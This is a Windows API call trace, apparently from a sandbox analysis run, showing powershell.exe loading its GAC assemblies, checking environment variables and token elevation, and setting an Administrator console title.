	[0251.714] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0xcd900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0252.416] CoTaskMemAlloc (cb=0x104) returned 0x15a590
	[0252.417] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x15a590, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0252.417] CoTaskMemFree (pv=0x15a590) 
	[0252.418] CoTaskMemAlloc (cb=0x104) returned 0x15a590
	[0252.418] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x15a590, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0252.418] CoTaskMemFree (pv=0x15a590) 
	[0252.775] CoTaskMemAlloc (cb=0x104) returned 0x15a590
	[0252.775] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x15a590, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0252.775] CoTaskMemFree (pv=0x15a590) 
	[0252.777] CoTaskMemAlloc (cb=0x104) returned 0x15a590
	[0252.777] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x15a590, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0252.777] CoTaskMemFree (pv=0x15a590) 
	[0252.777] CoTaskMemAlloc (cb=0x104) returned 0x15a590
	[0252.777] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x15a590, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0252.777] CoTaskMemFree (pv=0x15a590) 
	[0253.528] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0xcd900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0253.528] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0xcd900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0253.533] CoTaskMemAlloc (cb=0x104) returned 0x15a590
	[0253.533] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x15a590, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0253.533] CoTaskMemFree (pv=0x15a590) 
	[0253.536] CoTaskMemAlloc (cb=0x104) returned 0x15a590
	[0253.536] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x15a590, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0253.536] CoTaskMemFree (pv=0x15a590) 
	[0253.899] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0253.899] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0256.639] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0xcd900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0256.639] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0xcd900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0258.429] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0258.430] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0259.814] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0xcd900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0259.814] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0xcd900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0260.833] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xcd900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0260.834] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xcd900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0261.135] CoTaskMemAlloc (cb=0x104) returned 0x1b8428b0
	[0261.135] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8428b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0261.135] CoTaskMemFree (pv=0x1b8428b0) 
	[0261.137] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcdb00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0261.137] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcda50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0261.137] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcda50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0261.144] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcda50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0261.504] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0xcda20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0261.504] SetErrorMode (uMode=0x1) returned 0x1
	[0261.504] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0xcdca0 | out: lpFileInformation=0xcdca0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0261.504] SetErrorMode (uMode=0x1) returned 0x1
	[0265.500] CoTaskMemAlloc (cb=0x104) returned 0x1b8428b0
	[0265.500] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8428b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0265.500] CoTaskMemFree (pv=0x1b8428b0) 
	[0266.084] CoTaskMemAlloc (cb=0x104) returned 0x1b8428b0
	[0266.084] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8428b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0266.084] CoTaskMemFree (pv=0x1b8428b0) 
	[0266.085] CoTaskMemAlloc (cb=0x104) returned 0x1b8428b0
	[0266.085] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8428b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0266.085] CoTaskMemFree (pv=0x1b8428b0) 
	[0266.087] CoCreateGuid (in: pguid=0xce068 | out: pguid=0xce068*(Data1=0xdfe26c89, Data2=0x7949, Data3=0x46a4, Data4=([0]=0xb5, [1]=0x72, [2]=0xc6, [3]=0x61, [4]=0x94, [5]=0xa, [6]=0x18, [7]=0x9b))) returned 0x0
	[0266.090] CoTaskMemAlloc (cb=0x104) returned 0x1b8428b0
	[0266.090] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8428b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0266.090] CoTaskMemFree (pv=0x1b8428b0) 
	[0266.093] CoTaskMemAlloc (cb=0x104) returned 0x1b8428b0
	[0266.093] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8428b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0266.093] CoTaskMemFree (pv=0x1b8428b0) 
	[0266.095] CoTaskMemAlloc (cb=0x104) returned 0x1b8428b0
	[0266.095] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8428b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0266.095] CoTaskMemFree (pv=0x1b8428b0) 
	[0266.100] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf
	[0266.102] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0xcdd10 | out: lpConsoleScreenBufferInfo=0xcdd10) returned 1
	[0266.107] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13
	[0266.107] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0xcdd10 | out: lpConsoleScreenBufferInfo=0xcdd10) returned 1
	[0266.109] GetVersionExW (in: lpVersionInformation=0xcdca0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xcdca0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0266.111] GetCurrentProcess () returned 0xffffffffffffffff
	[0266.112] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0xcdd38 | out: TokenHandle=0xcdd38*=0x320) returned 1
	[0266.116] GetTokenInformation (in: TokenHandle=0x320, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xcdc58 | out: TokenInformation=0x0, ReturnLength=0xcdc58) returned 0
	[0266.117] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x137290
	[0266.117] GetTokenInformation (in: TokenHandle=0x320, TokenInformationClass=0x8, TokenInformation=0x137290, TokenInformationLength=0x4, ReturnLength=0xcdc58 | out: TokenInformation=0x137290, ReturnLength=0xcdc58) returned 1
	[0266.119] DuplicateTokenEx (in: hExistingToken=0x320, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0xcddb8 | out: phNewToken=0xcddb8*=0x31c) returned 1
	[0266.119] GetTokenInformation (in: TokenHandle=0x320, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xcdc58 | out: TokenInformation=0x0, ReturnLength=0xcdc58) returned 0
	[0266.119] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x1372c0
	[0266.119] GetTokenInformation (in: TokenHandle=0x320, TokenInformationClass=0x8, TokenInformation=0x1372c0, TokenInformationLength=0x4, ReturnLength=0xcdc58 | out: TokenInformation=0x1372c0, ReturnLength=0xcdc58) returned 1
	[0266.120] CheckTokenMembership (in: TokenHandle=0x31c, SidToCheck=0x2cbc368*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0xcddc8 | out: IsMember=0xcddc8) returned 1
	[0266.120] CloseHandle (hObject=0x31c) returned 1
	[0266.121] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0266.121] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd770, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0266.121] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd770, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0266.121] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd770, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0266.927] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0266.927] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd770, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0266.927] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd770, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0266.929] CoTaskMemAlloc (cb=0x804) returned 0x1b845880
	[0266.929] GetConsoleTitleW (in: lpConsoleTitle=0x1b845880, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0267.606] CoTaskMemFree (pv=0x1b845880) 
	[0267.630] CoTaskMemAlloc (cb=0x804) returned 0x1b8488e0
	[0267.630] GetConsoleTitleW (in: lpConsoleTitle=0x1b8488e0, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0267.630] CoTaskMemFree (pv=0x1b8488e0) 
	[0267.631] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0267.631] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0267.631] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0267.632] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1
	[0268.308] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd890, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0268.308] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0268.308] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0268.308] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0268.820] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd890, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0268.820] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0268.820] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0268.820] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd890, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0268.821] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0268.821] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0268.823] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0268.823] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
